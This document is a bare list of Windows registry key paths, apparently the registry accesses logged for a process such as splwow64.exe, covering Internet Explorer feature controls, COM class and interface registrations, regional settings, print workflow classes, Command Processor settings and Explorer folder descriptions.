HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\RunBinaryControlHostProcessInSeparateAppContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\splwow64.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\file\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FILEPROTOCOL_NOFINDFIRST_KB947853
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FILEPROTOCOL_NOFINDFIRST_KB947853
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\Elevation
HKEY_CURRENT_USER\Software\Classes\Interface\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PackagedCom\InterfaceIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PackagedCom\InterfaceIndex\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\\xed\xa0\xbc\xed\xbc\x8e\xed\xa0\xbc\xed\xbc\x8f\xed\xa0\xbc\xed\xbc\x8d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\EnableJavaScriptDebugging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe\JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PackagedCom\TypeLibIndex
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Graphics.Internal.Printing.Workflow.WorkflowSessionManager\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\CommandLine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\IdentityType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ActivatableClasses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServerType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\Identity
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ServiceName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\Server\PrintWorkflowUserSvc\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx\AllowDevelopmentWithoutDevLicense
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock\AllowDevelopmentWithoutDevLicense
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseActivationAuthenticationLevel
HKEY_CURRENT_USER\Software\Classes\AppID\splwow64.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\splwow64.exe\AppID
HKEY_CURRENT_USER\Software\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CB363445-F453-4C1E-8EE4-BD123C5E394F}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{AF86E2E0-B12D-4c6a-9C5A-D7AA65101E90}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{AF86E2E0-B12D-4c6a-9C5A-D7AA65101E90}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\DontUseArchive
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\System\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\OneDrive
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\FileCoAuthTelemetryRampStatus
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905E63B6-C1BF-494E-B29C-65B732D3D21A}
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{905e63b6-c1bf-494e-b29c-65b732d3d21a}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\DPLProtectionLevel
